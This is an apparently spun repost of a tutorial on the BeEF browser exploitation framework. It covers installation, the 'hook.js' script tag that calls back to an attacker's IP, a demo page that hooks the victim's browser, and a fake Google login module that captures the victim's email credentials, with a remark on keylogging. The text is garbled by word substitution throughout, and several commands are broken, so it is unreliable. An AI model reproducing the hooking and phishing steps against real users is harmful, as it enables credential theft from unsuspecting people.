Running Beef From the Command Line

• Cursory Introduction to BEeF
• Pre-requisites
  • Install SQLite
  • Install Reddish
  • Install Gemfiles
• Steps to perform BEeF Hacking
  • Stride ane: Installing BEeF
  • Footstep 2: Launching beef hacking framework
  • Step 3: Hooking the target web browser
  • Pace 4: Executing commands on the victim's browser
  • Footstep v: Launching a social-technology set on
• Summary
• References

Hi learners, in this guide we volition be applying both beef hacking and social engineering to steal credentials from our target'due south browser.  Man in the browser hacking is very difficult to find since the attacker will disguise himself equally a normal or verified user in order to obtain information either way(from user and from the server). A hacker sits in the centre of the communication aqueduct between the server and the website user.

Cursory Introduction to Beef

The word Beef stands for Browser Exploitation Framework. It utilizes the customer side assail vectors  to asses the security level of the target surroundings. Beefiness hacking involves hooking one or more than web browsers and using them to launch command modules to assault the target organisation within the browser context. Each browser may take a dissimilar set of attack vectors since each is within unlike security context.

Pre-requisites

• Have Ruby Installed (version 2.5 or newer)
• Have Node.js (10 or newer)
• Have SQLite.
• Have the gems listed in the Gem file
• Have Mac OSX x.5.0 or college (mod Linux)

Install SQLite

SQLite is a DBMS contained in C library just information technology is dissimilar from other database management systems in that it is not a client-server database engine rather information technology is embedded in the program. It comes pre-installed on Kali Linux.

Installing SQLite on linux we just need a single command.

sudo apt-get install sqlite3

Install Ruby

Ruby is an opensource  and dynamic programming language which is focused on simplicity. It is installed by default on Linux. But in case you find it missing you lot can install information technology past running the beneath control.

sudo apt-go install blood-red-full

Install Gemfiles

Gems are ruddy files used to extend its applications functionalities. They contains re-usable functions shared amidst Ruby users. We will install gemfiles using bundler since it makes it easier to install many gems in a unmarried command.

We open a final window and run below command to install bundler.

gem install bundler

We start by creating an empty gemfile on our beefiness-xss root binder and we copy paste the required gems in the gemfile. We then install the required gems from the specified sources using below commands.

$ package install $ git add Gemfile Gemfile.lock

NOTE:

Equally of now, Beefiness framework is not yet supported on windows.

Steps to perform Beefiness Hacking

With that in mind, allow'south bound correct into beef hacking.

Pace 1: Installing Beefiness

Beef does not come up pre-installed on newer versions of Kali Linux (from version 2019.iii) merely if you update an older version of Kali Linux you volition not loose the Beefiness framework. Merely you lot take to make certain to use "beefiness-xss" to launch the framework instead of "beef" as information technology was on earlier version. Even so, if y'all had Beef pre-installed earlier or y'all accept to install it, the installation command is the aforementioned.

sudo apt install beef-xss

Step 2: Launching beef hacking framework

Later on installing Beef nosotros now move on to the second step which is starting the framework in society to access the user interface and go the hook we need to attack our victim.

sudo beef-xss

On the area in the cherry-red box we take two very important things; the we UI - this is the link address from which you will admission the user panel of the beef hacking framework and the web-hook - this is a JavaScript script which yous need to insert to the vulnerable website in guild to hook your victim's browser in beef hacking.

NOTE:

BEeF default password is and username is "beef:beefiness"

The web UI should look like the one below

And later logging in we take a view that looks every bit shown below. From hither you can come across the hacked browsers both online and offline.

Step iii: Hooking the target web browser

Once we accept logged into beefiness hacking framework UI, we now accept to create a hook from which nosotros volition be able to assault the victim. The hook script looks like this.

<script src="http://<IP Accost>:3000/claw.js"></script>

Where we take IP you lot have to replace it with your IP accost from where your victim'south browser will claw back to. Beef hacking framework provides for a demo site which can exist accessed via

http://127.0.0.1:3000/demos/basic.html

Only we will be creating our own HTML file from where volition add our hook.

<html>   <head>     <championship>Beef HACKING</title>       <script src="http://127.0.0.1:3000/hook.js"></script>   </head>   <trunk>     <h1>Yous Take BEEN HACKED!!!</h1>   </body> </html>

We now have to run our HTML file on a web browser.

As you can see nosotros have our victims web browser hooked.

Step iv: Executing commands on the victim's browser

We now take a beefiness hacking hook on the victim'south browser and nosotros can execute numerous commands within the beef hacking framework in guild to collect important information we may require from the victim's browser.  some of the capabilities available on beef hacking framework are as shown below categorically.

Equally you tin can see we have over 100 commands which nosotros tin use against the victims' browsers.

Step 5: Launching a social-engineering attack

In this guide nosotros will try and conduct out a social engineering science attack on our victim in gild to acquire the user's login details. we simply take to select the control nosotros demand and execute it.

We volition be acquiring the user's g mail service login details. Once we execute the control,the victim volition exist redirected to a webpage similar to the google login folio requiring him/her to her username and password equally shown below.

And once the user enters his/her username and countersign nosotros will exist ale to view information technology correct from our beef hacking framework(run across image below). Subsequently the user clicks the sign in push, he/she will be redirected to the official google sign in page. This aids in making the set on more stealth.

We now take the user's email username and password. Beef hacking framework also acts as an advanced keylogger and information technology is able to collect the keys that have been clicked by a victim while using the browser this makes it more dangerous.

Summary

Beef hacking framework is a powerful tool that can be leveraged past systems security professionals to try and design systems especially web apps which are safe for use by the end user. A hacker with the necessary knowledge can also add his ain modifications on beef hacking framework to go far more powerful. For example, A hacker can blueprint the login page of whatsoever website he needs data from and even customize the URLs of the phishing page to make them wait more than believable in the eyes of the victim. We equally users of the net, nosotros should avoid visiting malicious and insecure websites to avoid being victims of beef hacking. Nosotros should also check the authenticity of spider web pages which require usa to provide them with personal details.

References

Homo-in-the-Browser Attacks
Hack Spider web Browsers with Beefiness to Control Webcams, Phish for Credentials & More than

Didn't find what yous were looking for? Perform a quick search across GoLinuxCloud

perryjuse1950.blogspot.com

Source: https://www.golinuxcloud.com/beef-hacking-framework-tutorial/

Share this post